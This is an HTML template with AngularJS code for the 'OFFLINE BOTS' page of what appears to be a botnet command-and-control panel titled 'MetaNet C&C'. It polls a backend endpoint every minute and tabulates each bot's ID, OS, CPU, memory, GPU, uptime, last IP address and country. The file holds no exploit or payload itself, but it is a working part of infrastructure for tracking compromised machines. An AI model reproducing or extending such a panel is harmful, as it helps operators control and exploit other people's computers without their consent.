<!DOCTYPE html >
<html>
<head lang="en">
    <meta charset="UTF-8">
    <title>MetaNet C&C</title>
    <link href="../static/dialogs.min.css" rel="stylesheet" type="text/css"/>
    <script src="../static/jquery-2.1.4.min.js"></script>
    <link href="../static/bootstrap.min.css" rel="stylesheet" type="text/css"/>
    <link href="../static/socket.css" rel="stylesheet" type="text/css"/>
    <script src="../static/angular-1.5.0-rc.0.min.js"
            type="text/javascript"></script>
    <script src="../static/angular-sanitize.min.js"
            type="text/javascript"></script>
    <script src="../static/dialogs.min.js"
            type="text/javascript"></script>
    <script src="../static/angular-animate.min.js" type="text/javascript"></script>
    <script src="../static/ng-contextmenu.min.js" type="text/javascript"></script>
    <link href="../static/menu/menu.css" rel="stylesheet" type="text/css"/>
    <script src="../static/ui-bootstrap-tpls-0.14.3.min.js" type="text/javascript"></script>


</head>
<body ng-app="botsApp" ng-controller="botsController">

{% block body %}
{% include 'menu.html' %}

<div>
    <div class="container">
<H1 align="center">OFFLINE BOTS</H1>
  <div class="panel-group">
    <div class="panel panel-default">
      <div class="panel-heading">Last Update : {{"lastupdate|date:'yyyy-MM-dd HH:mm:ss' " |angular}}</div>
    <h1></h1>
    <table id="bots" class="table table-striped row-border hover col-lg-12">
        <thead>
        <tr>
            <th class="text-center" ng-repeat="(key,value) in headers"
                ng-click="modelData.orderByField=value; modelData.reverseSort = !modelData.reverseSort" >
                {{key |angular}}
                        <span ng-show="modelData.orderByField == value">
                            <span ng-show="!modelData.reverseSort"> &#9662</span>
                            <span ng-show="modelData.reverseSort"> &#9652</span>
                        </span>
            </th>
        </tr>
        </thead>
        <tbody>

        <tr class="fade1" data-context-event="contextmenu" data-context-menu="static/menu/menu.html"
            ng-repeat="bot in bots">
            <td>{{bot.id |angular}}</td>
            <td>{{bot.version |angular}}</td>
            <td>{{bot.os_version |angular}}</td>
            <td>{{bot.cpu |angular}}</td>
            <td>{{"parseInt(bot.memory)/1024|number:2" |angular}}</td>
            <td>{{bot.gpu |angular}}</td>
            <td>~{{"bot.first_seen|relative_time" |angular}}</td>
            <td>{{"bot.last_seen|relative_time" | angular}}</td>
            <td>{{"bot.uptime|secondsToDHM" |angular}}</td>
            <td>{{bot.last_ip |angular}}</td>
            <td>{{bot.country|angular}}</td>
        </tr>
        </tbody>
    </table>

</div>
{% endblock %}
<script>


    var app = angular.module('botsApp', ['ui.bootstrap']);

    app.controller('botsController', function ($scope, $http, $interval) {
        $scope.modelData = {};
        $scope.headers = {
            'ID': 'id',
            'Version': 'version',
            'OS': 'os_version',
            'CPU': 'cpu',
            'Memory': 'memory',
            'GPU': 'gpu',
            'First seen': 'first_seen',
            'Last seen': 'last_seen',
            'Uptime': 'uptime',
            'Last IP': 'last_ip',
            'Country': 'country'
        };
        $scope.modelData.reverseSort = false;
        $scope.offlineBots = 0;
        $scope.bots = [];
        $scope.lastupdate= new Date();
        $http.post('../ajax/init_offline_bots').success(function (data, status) {
            updateBots(data);
        });

        function updateBots(data) {
            $scope.bots = [];
            $scope.offlinebots = 0;
            var jsondata = angular.fromJson(data);
            for (var key in jsondata) {
                var val = jsondata[key];
                console.log(val);
                $scope.bots.push(val);
                $scope.offlinebots += 1;
            }
            $scope.lastupdate= new Date();
        }

        function getOfflineBots() {
            $http.post("../ajax/init_offline_bots").success(function (data, status) {
                updateBots(data)
            });
        }


        $interval(getOfflineBots, 60000);
    });

    function secondsToDHM(seconds) {
        var days = parseInt(seconds / (60 * 60 * 24));
        seconds = seconds % (60 * 60 * 24);
        var hours = parseInt(seconds / (60 * 60));
        seconds = seconds % (60 * 60);

        var minutes = parseInt(seconds / 60);
        return days + "d " + hours + "h " + minutes + "m";
    }


    app.filter('secondsToDHM', function () {
        return function (seconds) {
            return secondsToDHM(seconds);
        }
    });

    app.filter('relative_time', function () {
        return function (epoch) {
            var parsed_date = new Date(parseInt(epoch) * 1000);
            var relative_to = (arguments.length > 1) ? arguments[1] : new Date(); //defines relative to what ..default is now
            var delta = parseInt((relative_to.getTime() - parsed_date) / 1000);
            delta = (delta < 2) ? 2 : delta;
            return secondsToDHM(delta) + " ago";
        }
    });

    app.filter('last_seen', function () {
        return function (last_seen) {
            var i = Math.round(+new Date() / 1000) - parseInt(last_seen);
            return i + " seconds ago";
        }
    });

</script>
</body>
</html>